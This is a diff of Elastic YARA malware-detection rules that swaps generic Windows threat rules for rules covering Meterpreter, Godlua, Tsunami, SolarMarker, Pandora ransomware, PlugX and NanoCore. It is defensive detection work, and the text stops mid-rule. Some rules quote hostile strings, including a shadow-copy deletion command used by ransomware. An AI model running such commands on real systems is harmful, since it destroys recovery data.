"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1220-L1238" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5814d7712304800d92487b8e1108d20ad7b44f48910b1fb0a99e9b36baa4333a" - logic_hash = "d0aa75debbefb301b9fc46ceca4944ae8c4b009118214a9589440b59089b853e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Virus_Floxif.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e628b7973ee25fdfd8f849fdf5923c6fba48141de802b0b4ce3e9ad2e40fe470" + logic_hash = "d3f516966bd4423c49771251075a1ea2f725aec91615f7f44dd098da2a4f3574" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0ca7d91a97c12f4640dd367d19d8645dd1da713cfa62289c40f8c34202ddf256" - severity = 50 + fingerprint = "6a043d05ca24846cfba28b5ea603a3e512a5af4f4e15629851a922190245ca1e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 89 E5 57 56 83 E4 F8 83 EC 20 8B 75 10 8B 7D 0C 89 E0 8D 4C 24 18 6A 05 6A 18 50 51 FF 75 08 68 BC 52 4D 90 E8 26 00 00 00 83 C4 18 85 FF 74 06 8B 4C 24 08 89 0F 85 F6 74 08 80 7C 24 15 00 } + $a = { 8B 54 24 04 80 7A 03 01 75 04 8D 42 04 C3 8D 42 04 53 8B C8 8A 5A 02 84 DB 74 02 30 19 8A 19 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_42B3E0D7 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Meterpreter_A82F5D21 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" author = "Elastic Security" - id = "42b3e0d7-ec42-4940-b5f3-e9782997dccf" - date = "2024-01-17" - modified = "2024-02-08" + id = "a82f5d21-3b01-4a05-a34a-6985c1f3b460" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1240-L1258" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "99ad416b155970fda383a63fe61de2e4d0254e9c9e09564e17938e8e2b49b5b7" - logic_hash = "58b4c667b6d796f4525afeb706394f593d03393e3a48e2a0b7664f121e6a78fe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Meterpreter.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d76886222de7292e8a76717f6d49452f52aaffb957bb0326bcfc7a35c3fdfc6a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7d3974400d05bc7bbcd63c99e8257d0676b38335de74a4bcfde9e86553f50f08" - severity = 50 + fingerprint = "b0adb928731dc489a615fa86e46cc19de05e251eef2e02eb02f478ed1ca01ec5" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 C4 F8 53 33 DB 6A 00 8D 45 F8 50 8B 45 0C 50 8B 45 10 50 6A 00 6A 00 33 C9 33 D2 8B 45 08 E8 B1 F7 FF FF 85 C0 75 05 BB 01 00 00 00 8B C3 5B 59 59 5D C2 0C 00 8D 40 00 53 BB E0 E1 } + $a = { F8 02 74 22 77 08 66 83 F8 01 74 20 EB 24 66 83 F8 03 74 0C 66 83 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_66142106 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Meterpreter_383C6708 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" author = "Elastic Security" - id = "66142106-d602-4b1b-a79b-64d692c613ca" - date = "2024-01-17" - modified = "2024-02-08" + id = "383c6708-0861-4089-93c3-4320bc1e7cfc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1260-L1278" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cd164a65fb2a496ad7b54c782f25fbfca0540d46d2c0d6b098d7be516c4ce021" - logic_hash = "bf5d8db3ed6d2abc3158b04e904351250bf17a6d766e31769b3c5a6e534165b0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Meterpreter.yar#L20-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d9d607f0bbc101f7f6dc0f16328bdd8f6ddb8ae83107b7eee34e1cc02072cb15" + logic_hash = "b0fd479722ab0808a4709cbacbb874282c48a425f4dbdaec9f74bc7f839c82e4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b5816297691fefc46ab11cb175a4e20d40c5095c20417e80590ceb05bd1ec974" - severity = 50 + fingerprint = "6e9da04c91b5846b3b1109f9d907d9afa917fb7dfe9f77780e745d17b799b540" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 10 6A 00 8D 4D F0 E8 6B FF FF FF 8B 45 F4 BA E9 FD 00 00 39 50 08 74 0C E8 29 48 00 00 33 D2 85 C0 75 01 42 80 7D FC 00 74 0A 8B 4D F0 83 A1 50 03 00 00 FD 8B C2 C9 C3 8B FF 56 } + $a = { 99 B6 10 48 89 D6 4D 31 C9 6A 22 41 5A B2 07 0F 05 48 96 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_51A1D82B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Meterpreter_621054Fe : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" author = "Elastic Security" - id = "51a1d82b-2ae0-45c9-b51d-9b54454dfcee" - date = "2024-01-17" - modified = "2024-02-08" + id = "621054fe-bbdf-445c-a503-ccba82b88243" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1280-L1298" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1a7adde856991fa25fac79048461102fba58cda9492d4f5203b817d767a81018" - logic_hash = "2d6b0560e1980deb6aad8e0902d065eeda406506b70bb8bb27c7fa58be9842f8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Meterpreter.yar#L40-L57" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "18f22bb0aa66ec2ecdaa9ca0e0d00ee59a2c9a3f231bd71915140e4464a4ea78" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fddf98cdb00734e50908161d6715e807b1c4437789af524d6f0a17df55572261" - severity = 50 + fingerprint = "13cb03783b1d5f14cadfaa9b938646d5edb30ea83702991a81cc4ca82e4637dc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 04 53 56 57 89 4D FC 8B 45 FC 50 FF 15 D0 63 41 00 5F 5E 5B C9 C3 CC CC CC CC CC 66 8B 01 56 66 8B 32 57 66 3B F0 72 44 75 0A 66 8B 79 02 66 39 7A 02 72 38 66 3B F0 75 14 66 8B } + $a = { 28 85 D2 75 0A 8B 50 2C 83 C8 FF 85 D2 74 03 8B 42 64 5D C3 55 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Dee3B4Bf : FILE MEMORY +rule ELASTIC_Linux_Trojan_Meterpreter_1Bda891E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" author = "Elastic Security" - id = "dee3b4bf-f09e-46a7-b177-6b1445db88ad" - date = "2024-01-17" - modified = "2024-02-08" + id = "1bda891e-a031-4254-9d0b-dc590023d436" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1300-L1318" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c7f4b63fa5c7386d6444c0d0428a8fe328446efcef5fda93821f05e86efd2fba" - logic_hash = "cfd7f9250ab44ffe12b62f84ae753032642d9aa2524d88a6d4d989a2afa043a3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Meterpreter.yar#L59-L76" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "74e7547472117de20159f5b158cee0ccacc02a9aba5e5ad64a52c552c966d539" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6f6cf93e5ac640d1e71f9554752a846c3cc051d95c232e2f4d8fa383d5a3b5af" - severity = 50 + fingerprint = "fc3f5afb9b90bbf3b61f144f90b02ff712f60fbf62fb0c79c5eaa808627aa0a1" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 4A 75 73 74 20 63 6F 70 79 20 74 68 65 20 70 61 74 63 68 20 74 6F 20 74 68 65 20 70 72 6F 67 72 61 6D 20 64 69 72 65 63 74 6F 72 79 20 61 6E 64 20 61 70 70 6C 79 2E } + $a = { 11 62 08 F2 0F 5E D0 F2 0F 58 CB F2 0F 11 5A 10 F2 44 0F 5E C0 F2 0F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Fdbcd3F2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Godlua_Ed8E6228 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Godlua (Linux.Trojan.Godlua)" author = "Elastic Security" - id = "fdbcd3f2-17e6-49d4-997b-91e6a85e4226" - date = "2024-01-17" - modified = "2024-02-08" + id = "ed8e6228-d5be-4b8e-8dc2-7072b1236bfa" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1320-L1338" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9258e4fe077be21ad7ae348868f1ac6226f6e9d404c664025006ab4b64222369" - logic_hash = "ca9136ca44a61795cca44ac9bb0494fdc34c08d6578603ba3be3582956f4a98f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Godlua.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "848ef3b198737f080f19c5fa55dfbc31356427398074f9125c65cb532c52ce7a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2a69deed3fe05b64cb37881ce50cae8972e7a610fd32c4b7f9155409bc5b297c" - severity = 50 + fingerprint = "9b73c2bbbe1bc43ae692f03b19cd23ad701f0120dff0201dd2a6722c44ea51ed" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 C4 FC 60 8B 75 0C 8D A4 24 00 00 00 00 8D A4 24 00 00 00 00 90 56 E8 22 00 00 00 0B C0 75 05 89 45 FC EB 11 89 35 84 42 40 00 46 8B 5D 08 38 18 75 E3 89 45 FC 61 8B 45 FC C9 C2 08 } + $a = { C0 18 48 89 45 E8 EB 60 48 8B 85 58 FF FF FF 48 83 C0 20 48 89 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B7852Ccf : FILE MEMORY +rule ELASTIC_Windows_Trojan_Solarmarker_D466E548 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Solarmarker (Windows.Trojan.SolarMarker)" author = "Elastic Security" - id = "b7852ccf-ba11-44e2-95b9-eb92d6976e15" - date = "2024-01-17" - modified = "2024-02-08" + id = "d466e548-eb88-41e6-9740-ae59980db835" + date = "2023-12-12" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1340-L1360" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5ac70fa959be4ee37c0c56f0dd04061a5fed78fcbde21b8449fc93e44a8c133a" - logic_hash = "4d5c29cceaacfda0c41bcd13cf95e90397b1b6c0c6beeb19b9184f435c8669b9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SolarMarker.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "330f5067c93041821be4e7097cf32fb569e2e1d00e952156c9aafcddb847b873" + hash = "e2a620e76352fa7ac58407a711821da52093d97d12293ae93d813163c58eb84b" + logic_hash = "c0792bc3c1a2f01ff4b8d0a12c95a74491c2805c876f95a26bbeaabecdff70e9" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "f33ef7996bcb0422227b9481d85b3663fb0f13f1be01837b42ac0c5f0bcff781" - severity = 50 + fingerprint = "0f4b0162ee8283959e10c459ddc55eb00eae30d241119aad1aa3ea6c101f9889" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 45 2B 34 2C 3D 43 4A 32 3A 24 40 2F 22 3E 3F 3C 24 44 } - $a2 = { 67 6F 72 67 65 6F 75 73 68 6F 72 6E 79 } - $a3 = { 62 6C 61 63 6B 20 68 61 69 72 75 6E 73 68 61 76 65 64 } + $a1 = { 00 00 2B 03 00 2B 15 00 07 2D 09 08 16 FE 01 16 FE 01 2B 01 17 00 13 04 11 04 2D 8C 07 2D 06 08 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_C3C8F21A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Solarmarker_08Bfc26B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Solarmarker (Windows.Trojan.SolarMarker)" author = "Elastic Security" - id = "c3c8f21a-4722-4b6f-85e1-023d45487aeb" - date = "2024-01-17" - modified = "2024-02-08" + id = "08bfc26b-efda-49b4-b685-57edca8b9d18" + date = "2024-05-29" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1362-L1380" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9a102873dd37d08f53dcf6b5dad2555598a954d18fb3090bbf842655c5fded35" - logic_hash = "b4d2b28fb2c9d46884b0b34f7821151b88891a8d881885c704e0e192cf7fca70" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SolarMarker.yar#L22-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1a6d2d78cc50f080f1fe4cadc6043027bf201d194f2b73625ce3664433a3966" + logic_hash = "b31b9f8460b606426c1101eba39a41a75c7ecaafc62388a6a5ac0f24057561ed" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5bae56d41d4582aed0a6fd54eab53ce6d47f0d70711cc17e77f8e85019d2ac7e" - severity = 50 + fingerprint = "9c0c4a5bce63c9d99d53813f7250b3ccc395cb99eaebb8c016f8c040fbfa4ea7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 89 E5 83 EC 14 53 56 57 8D 7D F7 BE 1E CA 40 00 B9 02 00 00 00 F3 A5 A4 68 62 CA 40 00 68 64 CA 40 00 E8 A8 25 00 00 83 C4 08 89 C3 8D 45 EC 50 E8 CA 24 00 00 59 8D 45 EC 50 E8 80 26 00 00 } + $a1 = { 07 09 91 61 D2 9C 09 20 C8 00 00 00 5D 16 FE 01 16 FE 01 13 } + $a2 = { 91 07 08 91 61 D2 9C 08 20 C8 00 00 00 5D 16 FE 01 16 FE 01 } + $a3 = { 06 08 06 08 91 07 08 91 61 D2 9C 08 20 C8 00 00 00 5D 16 FE } condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_A3D51E0C : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Pandora_Bca8Ce23 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Ransomware Pandora (Windows.Ransomware.Pandora)" author = "Elastic Security" - id = "a3d51e0c-9d49-48e5-abdb-ceeb10780cfa" - date = "2024-01-17" - modified = "2024-02-08" + id = "bca8ce23-6722-4cda-b5fa-623eda4fca1b" + date = "2022-03-14" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1382-L1400" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "18bd25df1025cd04b0642e507b0170bc1a2afba71b2dc4bd5e83cc487860db0d" - logic_hash = "f128f6a037abb4af2c11605b182852146780be6451b3062a2914bedb5c286843" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Pandora.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c940a35025dd3847f7c954a282f65e9c2312d2ada28686f9d1dc73d1c500224" + logic_hash = "52203c1af994667ba6833defe547e886dd02167e4d76c57711080e3be0473bfc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "069a218c752b5aac5b26b19b36b641b3dd31f09d7fcaae735efb52082a3495cc" - severity = 50 + fingerprint = "0da732f6bdf24f35dee3c1bf85435650a5ce9b5c6a93f01176659943c01ad711" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 53 56 8B 75 08 33 DB 39 5D 14 57 75 10 3B F3 75 10 39 5D 0C 75 12 33 C0 5F 5E 5B 5D C3 3B F3 74 07 8B 7D 0C 3B FB 77 1B E8 05 F8 FF FF 6A 16 5E 89 30 53 53 53 53 53 E8 97 F7 FF FF 83 } + $a1 = "/c vssadmin.exe delete shadows /all /quiet" wide fullword + $a2 = "\\Restore_My_Files.txt" wide fullword + $a3 = ".pandora" wide fullword condition: all of them } -rule ELASTIC_Windows_Generic_Threat_54Ccad4D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Plugx_5F3844Ff : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Plugx (Windows.Trojan.PlugX)" author = "Elastic Security" - id = "54ccad4d-3b8d-4abb-88eb-d428d661169d" - date = "2024-01-17" - modified = "2024-02-08" + id = "5f3844ff-2da6-48b4-9afb-343149af03ac" + date = "2023-08-28" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1402-L1422" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fe4aad002722d2173dd661b7b34cdb0e3d4d8cd600e4165975c48bf1b135763f" - logic_hash = "b9fb525be22dd2f235c3ac68688ced5298da45194ad032423689f5a085df6e31" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PlugX.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a823380e46878dfa8deb3ca0dc394db1db23bb2544e2d6e49c0eceeffb595875" + logic_hash = "a1a484f4cf00ec0775a3f322bae66ce5f9cc52f08306b38f079445233c49bf52" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4fe13c4ca3569912978a0c2231ec53a715a314e1158e09bc0c61f18151cfffa3" - severity = 50 + fingerprint = "5365e6978ffca67e232165bca7bcdc5064abd5c589e49e19aa640f59dd5285ab" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 4D 55 73 65 72 4E 61 74 69 66 65 72 63 } - $a2 = { 4D 79 52 65 67 53 61 76 65 52 65 63 6F 72 64 } - $a3 = { 53 74 65 61 6C 65 72 54 69 6D 65 4F 75 74 } + $a1 = "EAddr:0x%p" + $a2 = "Host: [%s:%d]" ascii fullword + $a3 = "CONNECT %s:%d HTTP/1.1" ascii fullword + $a4 = "%4.4d-%2.2d-%2.2d %2.2d:%2.2d:%2.2d:" wide fullword + $a5 = "\\bug.log" wide fullword condition: all of them } -rule ELASTIC_Windows_Generic_Threat_6Ee18020 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Plugx_F338Dab5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Plugx (Windows.Trojan.PlugX)" author = "Elastic Security" - id = "6ee18020-71e2-4003-99ef-963663e94740" - date = "2024-01-17" - modified = "2024-02-08" + id = "f338dab5-8c8f-46d7-8f93-48077fc76da1" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1424-L1442" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d58d8f5a7efcb02adac92362d8c608e6d056824641283497b2e1c1f0e2d19b0a" - logic_hash = "8a08973ae2ddde275e007686fc6eca831c1fb398b7221d5022da10f90da0e44d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PlugX.yar#L25-L45" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8af3fc1f8bd13519d78ee83af43daaa8c5e2c3f184c09f5c41941e0c6f68f0f7" + logic_hash = "0482305a73bc500aa7c266536cb8286ea796f6b1eaba39547bed22313bbb4457" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b8b18dcec6556bc7fb9b9f257a6485bcd6dfde96fc5c7e8145664de55d0c6803" - severity = 50 + fingerprint = "7c9f3d739eb17c545ded116387400340117acc23f3ef9fec9eacf993f1d2eb80" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 53 8B 5D 0C 8B 45 08 50 E8 9C 19 02 00 59 89 03 89 53 04 83 7B 04 00 75 07 83 3B 00 76 10 EB 02 7E 0C C6 43 28 01 33 C0 5B 5D C3 5B 5D C3 B8 01 00 00 00 5B 5D C3 90 90 90 55 8B EC 53 } + $a1 = { 45 08 FF B0 60 03 00 00 E8 A8 0C 00 00 83 C4 24 8D 45 08 89 } + $a2 = { 2C 5E 5F 5B 5D C3 CC 55 53 57 56 83 EC 10 8B 6C 24 30 8B 44 } + $a3 = { 89 4D D4 83 60 04 00 3B F3 75 40 E8 53 DA FF FF 8B 40 08 89 } condition: - all of them + 2 of them } -rule ELASTIC_Windows_Generic_Threat_8Eb547Db : FILE MEMORY +rule ELASTIC_Windows_Trojan_Nanocore_D8C4E3C5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Nanocore (Windows.Trojan.Nanocore)" author = "Elastic Security" - id = "8eb547db-81e4-4c64-9bab-b7944af32345" - date = "2024-01-17" - modified = "2024-02-08" + id = "d8c4e3c5-8bcc-43d2-9104-fa3774282da5" + date = "2021-06-13" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1444-L1462" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3fc821b63dfa653b86b11201073997fa4dc273124d050c2a7c267ac789d8a447" - logic_hash = "73cabad0656c6b347def017b07138fdbdd5b41da5ccf7d701fea764669058f39" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Nanocore.yar#L1-L29" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd" + logic_hash = "fcc13e834cd8a1f86b453fe3c0333cd358e129d6838a339a824f1a095d85552d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2de0d43a4c1c4b3ecef7272d3f224bd5203c130365ff49a02a9200b3f53fe6ba" - severity = 50 + fingerprint = "e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 28 00 00 0A 20 B8 0B 00 00 20 10 27 00 00 6F 29 00 00 0A 28 1F 00 00 0A 7E 0D 00 00 04 2D 0A 28 23 00 00 06 28 19 00 00 06 7E 14 00 00 04 6F 2A 00 00 0A 26 17 2D C8 2A 13 30 01 00 41 00 00 00 } + $a1 = "NanoCore.ClientPluginHost" ascii fullword + $a2 = "NanoCore.ClientPlugin" ascii fullword + $b1 = "get_BuilderSettings" ascii fullword + $b2 = "ClientLoaderForm.resources" ascii fullword + $b3 = "PluginCommand" ascii fullword + $b4 = "IClientAppHost" ascii fullword + $b5 = "GetBlockHash" ascii fullword + $b6 = "AddHostEntry" ascii fullword + $b7 = "LogClientException" ascii fullword + $b8 = "PipeExists" ascii fullword + $b9 = "IClientLoggingHost" ascii fullword condition: - all of them + 1 of ($a*) or 6 of ($b*) } -rule ELASTIC_Windows_Generic_Threat_803Feff4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_D9E6B88E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "803feff4-e4c2-4d8c-b736-47bb10fd5ce8" - date = "2024-01-17" - modified = "2024-02-08" + id = "d9e6b88e-256c-4e9d-a411-60b477b70446" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1464-L1482" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8f150dfb13e4a2ff36231f873e4c0677b5db4aa235d8f0aeb41e02f7e31c1e05" - logic_hash = 